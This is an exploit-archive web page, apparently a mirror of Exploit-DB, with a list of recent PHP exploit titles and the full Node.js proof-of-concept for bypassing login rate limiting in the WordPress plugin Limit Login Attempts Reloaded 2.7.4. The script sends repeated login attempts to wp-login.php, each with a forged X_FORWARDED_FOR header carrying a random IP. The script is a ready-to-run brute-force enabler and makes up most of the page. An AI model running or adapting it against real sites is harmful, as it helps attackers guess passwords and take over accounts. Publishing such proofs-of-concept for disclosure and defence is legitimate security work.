Menu

Improved exploit search engine. Try it out

"WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass"

Author

isdampe

Platform

php

Release date

2019-04-08

Release Date Title Type Platform Author
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
Release Date Title Type Platform Author
2019-04-08 "WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass" webapps php isdampe
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46672/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46672/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46672/41121/wordpress-plugin-limit-login-attempts-reloaded-274-login-limit-bypass/download/", "exploit_id": "46672", "exploit_description": "\"WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass\"", "exploit_date": "2019-04-08", "exploit_author": "isdampe", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env node
const request = require("request")

/**
 * Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass
 * Date: 2019-04-08
 * Exploit Author: isdampe
 * Software Link: https://wordpress.org/plugins/limit-login-attempts-reloaded
 * Version: 2.7.4
 * Tested on: WordPress 5.1.1
 *
 * Description
 * -----------
 *
 *  The plugin's primary goal is to limit the rate at which an individual can attempt
 *  to authenticate with WordPress. Plugin has support for HTTP headers 
 *  X_FORWARDED_FOR and X_SUCURI_CLIENTIP to allow rate limiting for users
 *  when web servers are behind a reverse proxy service.
 *  However, REMOTE_ADDR is not verified as a whitelisted proxy address, thus
 *  allowing an attacker to easily forge either the X_FORWARDED_FOR or 
 *  X_SUCURI_CLIENTIP headers to completely bypass the rate limiting service.
 *
 *  PoC
 *  ---
 */
class LoginRequest
{
	constructor(loginUri, numberOfRepititions) {
		this._loginUri = loginUri
		this._numberOfRepititions = numberOfRepititions
		this._count = 0
	}

	async process() {
		await this._sendRequest()
		if (this._count++ < this._numberOfRepititions)
			this.process()
	}

	async _sendRequest() {
		return new Promise(async (resolve, reject) => {
			console.log(`Sending request ${this._count}...`)

			request.post({
				url : this._loginUri,
				form: {
					"log": this._getRandomString(),
					"pwd": this._getRandomString(),
					"wp-submit": "Log+In",
					"redirect_to": "/wp-admin/",
					"testcookie": "1"
				},
				headers: {
					"X_FORWARDED_FOR": this._getRandomIp()
				}
			}, (err, res, body) => {
				if (err)
					console.error(err)

				if (body.indexOf("Too many failed") > -1) {
					reject("Login was rejected, exploit failed.")
					return
				}

				resolve()
				console.log(`\tRequest ${this._count} was not blocked`)
			})

		})
	}

	_getRandomString() {
		const map = "abcdefghijklmnopqrstuvwxyz0123456789"
		const length = Math.floor(Math.random() * 15) + 1
		let buffer = ""
		for (let i=0; i<length; ++i)
			buffer += Math.floor(Math.random() * map.length)

		return buffer
	}

	_getRandomIp() {
		const bits = []
		for (let x=0; x<4; ++x)
			bits.push(Math.floor(Math.random() * 254)) + 1
		return bits.join(".")
	}

}

if (process.argv.length < 4) {
	console.log("Usage: ./bypass-ip-block.js [url] [number_of_repititions]")
	console.log("\turl:                     The url pointing to wp-login.php, (e.g. http://localhost/wp-login.php)")
	console.log("\tnumber_of_repititions:   The number of login attempts to create (e.g. 500)")
	process.exit(1)
}

const session = new LoginRequest(process.argv[2], process.argv[3])
session.process()